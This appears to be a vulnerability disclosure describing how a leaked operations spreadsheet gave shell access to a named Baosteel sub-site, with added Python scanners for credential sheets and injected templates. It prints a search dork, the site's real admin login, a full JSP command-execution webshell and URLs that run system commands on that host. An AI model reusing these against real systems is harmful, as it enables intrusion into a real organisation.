Getshell caused by leakage of O&M documents of a sub-site of Baosteel Trading Company
Operation and maintenance (O&M) documents for the sub-sites of Baosteel Trading Company were leaked; they include intranet information, the admin backend addresses of multiple sub-sites, and usernames and passwords.
Among them, www.nesteel.cn (Shenyang Baosteel Northeast Trading Company) allows a shell to be obtained.
Google query string: Baosteel filetype:xlsx intext:password
The document contains the backend usernames and passwords, as well as management information, for multiple intranet hosts.
Backend: http://www.nesteel.cn/cms_wz/login.jsp
Username: admin
Password: admin
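The leak was found with nothing more than a search-engine query, so the defender-side counterpart is to audit the company's own file shares for spreadsheets that hold credentials before a crawler indexes them. The following is an added example, not code from the report or from Baosteel: it builds a minimal .xlsx in memory (a constructed sample; the hostnames, URL and values are placeholders) and scans the workbook's shared-string table for credential column headers and for intranet addresses stored beside them. The regexes and the risk ranking are assumptions chosen for this demonstration.

```python
"""Audit spreadsheets on a file share for plaintext credentials before a
search engine finds them.  Added example, not from the original report:
it builds a minimal .xlsx in memory (a constructed sample) and scans the
workbook's shared-string table for cells that look like credential headers,
plus any intranet addresses stored beside them."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SST_NS = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"
# Column headers under which O&M sheets typically store secrets (assumed list).
LABEL_RE = re.compile(r"\b(password|passwd|pwd|secret|token)\b", re.IGNORECASE)
# URLs and dotted-quad addresses: the intranet map an attacker values most.
ADDRESS_RE = re.compile(r"https?://\S+|\b\d{1,3}(?:\.\d{1,3}){3}\b")


def shared_strings(xlsx_bytes):
    """Return every text cell in the workbook's shared-string table, in order.
    Text cells in real workbooks land here; numbers and inline strings do not,
    so this is a heuristic first pass, not a full sheet parser."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        if "xl/sharedStrings.xml" not in zf.namelist():
            return []
        root = ET.fromstring(zf.read("xl/sharedStrings.xml"))
    return ["".join(t.text or "" for t in si.iter(SST_NS + "t"))
            for si in root.iter(SST_NS + "si")]


def scan_workbook(xlsx_bytes):
    """Classify the workbook's strings into credential labels and addresses."""
    findings = {"credential_labels": [], "addresses": []}
    for cell in shared_strings(xlsx_bytes):
        if LABEL_RE.search(cell):
            findings["credential_labels"].append(cell)
        if ADDRESS_RE.search(cell):
            findings["addresses"].append(cell)
    return findings


def risk_level(findings):
    """A sheet that pairs secrets with the hosts they open is the worst case."""
    if findings["credential_labels"] and findings["addresses"]:
        return "high"
    if findings["credential_labels"] or findings["addresses"]:
        return "medium"
    return "low"


def build_sample_xlsx(strings):
    """Construct a minimal .xlsx whose shared-string table holds `strings`.
    Only the part the scanner reads is written; this is a constructed sample
    for the demonstration, not a complete workbook."""
    items = "".join(f"<si><t>{escape(s)}</t></si>" for s in strings)
    sst = (f'<sst xmlns="{SST_NS[1:-1]}" count="{len(strings)}" '
           f'uniqueCount="{len(strings)}">{items}</sst>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/sharedStrings.xml", sst)
    return buf.getvalue()


# Constructed sample mirroring the layout of a leaked O&M sheet: hostnames,
# backend URLs and a Password column; the values are placeholders.
SAMPLE_STRINGS = [
    "Host", "Backend URL", "Username", "Password",
    "10.0.0.12", "http://cms.example.internal/login.jsp", "admin", "admin",
]
SAMPLE_XLSX = build_sample_xlsx(SAMPLE_STRINGS)

if __name__ == "__main__":
    result = scan_workbook(SAMPLE_XLSX)
    print(risk_level(result), result)
```

Run this over every workbook on the share (or on the web server's document root) and treat a "high" result as a document that must be removed from the share and whose credentials must be rotated, since a real sheet of this shape is exactly what the query above turned up.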
Once logged in to the backend, the template editing function can be used to add JSP code.
Code added:
<%@ page import="java.util.*,java.io.*"%><%if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } }%>
The site preview function then renders the modified template, so commands can be executed by passing them in the cmd parameter, which yields a shell.
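The chain above leaves two traces a defender can look for: an execution sink fed by a request parameter inside a CMS template, and preview requests that carry a parameter the CMS never sends. The following is an added example and not the CMS's own code; the template names, template bodies and access-log lines are constructed samples, while the preview path /cms_wz/DispatchAction.do and the cmd parameter are taken from the report.

```python
"""Find command-execution webshell fragments in CMS templates and spot the
preview requests that drive them.  Added example, not the CMS's own code:
template names, template contents and the access-log lines are constructed
samples; the preview path and the cmd parameter come from the report."""
import re
from urllib.parse import parse_qs, urlsplit

# A request-controlled value (source) reaching a process-execution call (sink)
# is the signature of the one-line shell shown in the report.
SOURCE_RE = re.compile(r"request\.getParameter\s*\(")
SINKS = [
    ("Runtime.exec", re.compile(r"Runtime\.getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(")),
    ("ProcessBuilder", re.compile(r"new\s+ProcessBuilder\s*\(")),
]


def scan_template(name, text):
    """Return one finding per execution sink found in a template body."""
    has_source = bool(SOURCE_RE.search(text))
    return [
        {"template": name, "sink": label,
         # A sink fed straight from a request parameter is a remote shell.
         "severity": "critical" if has_source else "high"}
        for label, sink in SINKS if sink.search(text)
    ]


# Common log format: client, identd, user, [timestamp], "request", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def flag_preview_requests(lines, preview_path="/cms_wz/DispatchAction.do",
                          suspicious=("cmd",)):
    """Flag preview-endpoint hits carrying a parameter the CMS never sends."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != preview_path:
            continue
        params = parse_qs(url.query)
        for name in suspicious:
            for value in params.get(name, []):
                hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "param": name, "value": value})
    return hits


# Constructed templates: one untouched, one carrying an injected scriptlet.
SAMPLE_TEMPLATES = {
    "footer.jsp": '<footer><%= request.getParameter("lang") %></footer>',
    "header.jsp": ('<%@ page import="java.io.*"%><% Process p = Runtime.getRuntime()'
                   '.exec(request.getParameter("cmd")); %><header/>'),
}

# Constructed access-log lines; the key value is a labelled placeholder.
SAMPLE_LOG = """\
198.51.100.4 - - [10/Oct/2013:13:55:36 +0800] "GET /cms_wz/login.jsp HTTP/1.1" 200 1024
203.0.113.7 - - [10/Oct/2013:13:57:01 +0800] "GET /cms_wz/DispatchAction.do?efFormEname=ECTM40&passPermit=true HTTP/1.1" 200 2048
203.0.113.7 - - [10/Oct/2013:13:58:12 +0800] "GET /cms_wz/DispatchAction.do?efFormEname=ECTM40&key=ENCRYPTED-KEY-PLACEHOLDER&passPermit=true&cmd=id HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    for name, body in SAMPLE_TEMPLATES.items():
        print(scan_template(name, body))
    print(flag_preview_requests(SAMPLE_LOG.splitlines()))
```

The template scan is the higher-value check: the injected scriptlet persists on disk and is found even when logs have rotated, and any template that pairs a parameter source with an execution sink has no legitimate reason to exist in a content site.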
Because the documents expose a large amount of intranet information, the potential damage is estimated to be far greater; there was no time to test further.
Site preview URL:
view-source:http://www.nesteel.cn/cms_wz/DispatchAction.do?efFormEname=ECTM40&key=<encrypted key>&passPermit=true&cmd=id
view-source:http://www.nesteel.cn/cms_wz/DispatchAction.do?efFormEname=ECTM40&key=AWIAPwFqUzICY1dgB2AMbQNnAmEGYgM0UGMFNQJmUGIBEgxDXUZVd1ZHAUZfSFc2&passPermit=true&cmd=cat /etc/passwd
Solution:
Stop sharing the O&M documents, and change the backend password to a strong one.